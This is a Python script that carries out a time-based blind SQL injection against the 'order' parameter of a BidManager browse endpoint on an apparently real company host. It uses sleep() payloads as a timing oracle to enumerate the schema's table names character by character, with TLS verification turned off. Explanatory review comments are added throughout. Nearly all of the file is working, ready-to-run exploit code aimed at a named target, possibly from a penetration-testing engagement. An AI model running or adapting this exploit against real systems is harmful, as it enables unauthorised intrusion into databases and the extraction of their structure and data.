- #/usr/bin/python3
- import requests
- import string
- import urllib3
# Disable ssl warnings because of the VPN connection
# NOTE(review): this also silences the warning that every requests.get(...,
# verify=False) call below would otherwise print; certificate verification is
# off for all requests made by this file.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Requests stuff
BASE_URL = "https://my.hughesnet.com.uat2.net"
USER_AGENT = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
}
# SQLi sleep time
# Seconds the injected sleep() is asked to run. A response slower than this
# is read as a "true" answer by do_like_query / do_exact_query; the HTTP
# timeout is SLEEP_TIME + 1, so a ReadTimeout is counted as "true" as well.
SLEEP_TIME = 10
# Build the character pool
# Sorted so the enumeration order in main() is the plain code-point order,
# which is presumably what the CACHE comparison in do_like_query relies on.
CHARACTER_POOL: list[str] = []
CHARACTER_POOL.extend(string.ascii_letters)
CHARACTER_POOL.extend(string.digits)
CHARACTER_POOL.extend([".", "_", "-", " ", "~", "|", "/", "(", ")", "=", "@", "\t", "\n"])
CHARACTER_POOL.sort()
# Define cache, really only needed to speed up testing
# Nothing in this file appends to CACHE, so it stays empty unless edited by
# hand; the sort below is therefore a no-op.
CACHE: list[str] = []
CACHE.sort()
# Result array
# Filled by main() with prefixes that passed do_exact_query.
VALID_WORDS: list[str] = []
- # Current queries enumerate all tables in the database
def do_like_query(prefix: str) -> bool:
    """Return True when the timing oracle reports a table name starting with *prefix*.

    The verdict is purely timing based: a response that takes longer than
    SLEEP_TIME seconds, or a ReadTimeout (the timeout is SLEEP_TIME + 1),
    counts as a match. Any other requests exception propagates to the caller.

    Side effects: prints progress and performs one HTTP GET against BASE_URL
    unless the CACHE short-circuit returns early.

    From a defender's view every probe is a plain GET whose ``order`` parameter
    contains ``select sleep(`` and that stalls the server for ~SLEEP_TIME s,
    so both the access log and a slow-query log show the activity.
    """
    # Check cache
    print(f"Testing characters with LIKE query: {prefix}")
    # Only consulted while nothing has been validated yet. Walks the prefix
    # against the last cached word position by position and answers False on
    # the first position where the cached character sorts after the new one.
    if len(VALID_WORDS) == 0 and len(CACHE) > 0:
        last_word = CACHE[-1]
        for known_letter, new_letter in zip(last_word, prefix):
            if known_letter > new_letter:
                print(f"like cache hit for {known_letter=} with {new_letter=} in {prefix=}")
                return False
    # Do real request
    # "\_" is not a recognised Python escape sequence, so this inserts a
    # literal backslash before each underscore (presumably to stop "_" acting
    # as a LIKE single-character wildcard).
    prefix = prefix.replace("_", "\_")
    # f-strings do not collapse "%%", so the pattern really ends in two
    # percent signs.
    like_payload = f",(select * from (select sleep({SLEEP_TIME}) from dual where table_schema = 'BidManager' and table_name like binary '{prefix}%%')a)-- "
    path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{like_payload}&fromPagination=1&orderBy=quantityRequired"
    url = BASE_URL + path
    try:
        # verify=False: the server certificate is not checked (see the
        # urllib3.disable_warnings call at the top of the file).
        res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
        time_taken = res.elapsed.total_seconds()
        return time_taken > SLEEP_TIME
    except requests.exceptions.ReadTimeout:
        # The timeout is SLEEP_TIME + 1, so hitting it is read as "the sleep fired".
        return True
- # Validate the found word to eliminate false positives
def do_exact_query(search: str) -> bool:
    """Return True when the timing oracle reports a table named exactly *search*.

    Used by main() to confirm a prefix that do_like_query accepted. The
    decision rule is the same as in do_like_query: elapsed time above
    SLEEP_TIME, or a ReadTimeout, means "true"; other requests exceptions
    propagate.

    Side effects: prints progress and performs one HTTP GET against BASE_URL
    unless *search* is already in CACHE.
    """
    # Check cache
    print(f"Validating result with exact query: {search}")
    # An exact cache hit is trusted without a request.
    if search in CACHE:
        print("exact cache hit")
        return True
    # Do real request
    # "\_" is not a Python escape, so this is backslash + underscore; the
    # "in" guard is redundant with replace() but harmless.
    if "_" in search:
        search = search.replace("_", "\_")
    # Unlike do_like_query this selects from information_schema.tables and
    # compares the whole name with "binary table_name = ..." (case-sensitive).
    exact_payload = f",(select * from (select sleep({SLEEP_TIME}) from information_schema.tables where table_schema = 'BidManager' and binary table_name = '{search}')a)-- "
    path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{exact_payload}&fromPagination=1&orderBy=quantityRequired"
    url = BASE_URL + path
    try:
        # verify=False: TLS certificate not checked.
        res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
        time_taken = res.elapsed.total_seconds()
        return time_taken > SLEEP_TIME
    except requests.exceptions.ReadTimeout:
        # Timeout is SLEEP_TIME + 1, so a timeout is counted as a match.
        return True
- # Actually do some programming
def main(prefix: str = "") -> None:
    """Depth-first walk over CHARACTER_POOL, extending *prefix* one character at a time.

    For each pool character the LIKE oracle is asked about ``prefix + char``;
    a hit recurses with the longer prefix. Only when the *last* pool character
    misses is the current ``prefix`` itself checked with the exact oracle and,
    on success, appended to the module-level VALID_WORDS. Nothing is returned;
    results live in VALID_WORDS. Recursion depth equals the length of the
    longest name found.
    """
    for idx, char in enumerate(CHARACTER_POOL):
        results = do_like_query(prefix + char)
        if results:
            print("[+] Got a hit, entering next recursion depth")
            main(prefix + char)
        else:
            # Validation is tied to the final pool index, so it runs once per
            # prefix, after every extension has been tried.
            if idx == (len(CHARACTER_POOL) - 1) and do_exact_query(prefix):
                print("[+] Validation successful!")
                VALID_WORDS.append(prefix)
                print(f"Word found: {prefix}")
if __name__ == '__main__':
    # Start from the empty prefix; findings accumulate in VALID_WORDS and are
    # printed once the whole walk has finished.
    main()
    print(f"Results: {VALID_WORDS}")